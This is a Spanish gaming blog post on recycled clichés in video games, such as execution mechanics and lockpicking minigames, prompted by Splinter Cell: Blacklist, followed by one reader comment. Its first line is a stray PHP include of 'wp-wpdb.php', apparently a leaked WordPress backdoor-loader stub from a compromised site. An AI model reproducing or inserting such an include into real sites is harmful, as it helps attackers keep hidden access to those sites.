if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los clichés en los videojuegos – La Fortaleza de LeChuck

Los clichés en los videojuegos

Viendo el gameplay de la nueva aventura de Sam Fisher que llegará bajo el título Splinter Cell: Blacklist me volvió a la cabeza el tema de los cliches. Sobre este tema ya realicé alguna reseña en una antigua entrada con los nuevos títulos de Hitman y Tomb Raider. Por lo tanto esta entrada está dedicado a todos los recursos que se repiten una y otra vez en diversos títulos de un mismo género.

Para empezar aquí os pongo el vídeo de presentación del nuevo Splinter Cell: Blacklist del E3 2012 en donde podemos ver un gameplay comentado que nos muestra las habilidades y jugabilidad de Sam en esta nueva aventura.
Como fan de los juegos de infiltración en general y de Sam Fisher en particular me he interesado en la trayectoria de este título que saldrá a principios de 2013. Pero viendo el vídeo me han abordado muchas preguntas, pero una que siempre me ronda la cabeza es: ¿Estamos jugando muchas veces al mismo juego a pesar de cambiar de títulos?.
Desde hace unos años hasta ahora prácticamente muchos juegos que comparten género también comparten recursos comerciales en su jugabilidad. Tal es así que en los juegos nos aparezcan, por ejemplo, continuamente los «tiempos de ejecución», que no es más que la evolución del antigüo tiempo foco. Gracias a esta técnica podemos ver como Sam Fisher se carga a una sala entera antes de abrir la puerta o antes de acabar la cinematografía. Este tipo de «ejecución» lo hemos visto en juegos como Splinter Cell: Conviction; Call of Juarez 2 o Red Dead Redemption entre otros… aunque con leves modificiaciones. ¿Están algunos recursos fomentando la espectacularidad cinematográfica en detrimento de la jugabilidad para «hypear» al espectador que visiona los gameplays?
Seguro que en el vídeo, cuando Fisher empieza a escalar la pared vuestra mente automáticamente os a recordado a cierto famoso personaje de videojuegos, ¿no?. Y es que ¿cuántas veces jugando a un nuevo juego no hemos dicho esto es como tal juego o esto se parece a este otro?. ¡Ojo! no confundamos los cliches o recursos de moda entre los desarrolladores con las características básicas del género.

Assassins Creed ha bebido recursos de muchos juegos a la vez que ha aportado a muchos otros.

Las características de un juego son las propias del género al que pertenece, de esta manera encontraremos que todos los FPS compartan un gran número de aspectos, al igual que en todos los SandBox encontramos libertad de movimiento y puntos localizados en los cuales se nos mandarán tareas y misiones. Los clichés además pueden darse entre juegos de diferentes géneros. Por eso hemos visto ya tiempos focos en FPS, Terceras personas y Sandbox o hemos abierto puertas con una ganzua a través de un minijuego en casi todos los géneros que tengan que ver con la acción; hemos machacado botones; hemos usado a enemigos como escudo; hemos hecho «fatalities» o hemos saqueado los cadáveres de nuestros enemigos.

¿Cuántos «minijuegos» habremos superado ya, para abrir una puerta con una ganzúa?

Pero, ¿es esto malo?. ¿Es malo que se reutilicen los mismos recursos una y otra vez como si de la filosofía de uso del software se tratara?; ¿Es malo tomar referencias de los títulos que han triunfado para intentar enganchar al público con unas apariencias similares?. Yo todavía no se muy bien dónde posicionarme ya que de momento no he dado la espalda a un juego porque simplemente tenga influencias de un lado y del otro pero, si es cierto que cuando veo gameplays de futuros juegos o de nuevos juegos que me planteo comprar me resaltan todos los recursos que ya he exprimido en otros títulos y que no aportan innovación.

¿Creéis que llegará un momento en el que veamos juegos totalmente nuevos?. Juegos que reinventen la manera de hacer todo lo que hacemos durante años atrás y que cuándo veamos un trailer o gameplay volvamos a decir «Mira esto, nunca lo había visto». Pero mientras eso pasa, no sé que ocurre que seguiré viciando con todo lo que se me ponga por delante, lo haya, o no, hecho 1000 veces. Y por cierto, saldrá el nuevo Splinter Cell y me fliparé como el primer día.

¿Qué opináis vosotros?, ¿Habéis detectado muchos clichés en los nuevos títulos que estáis jugando?

Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

2 comentarios

  1. Muy bien hablado. Los juegos se repiten hasta la saciedad, y directamente ya sabemos como, incluso, se controlan o ejecutamos las acciones en cada género de cada juego.

    La repetición de situaciones me repatea, no es emocionante y no soy repetidor de juegos, una vez me paso un juego dificilmente lo volveré a oler. Menos quiero comprar uno nueva y tener constantes Deja vu.

Dejar un comentario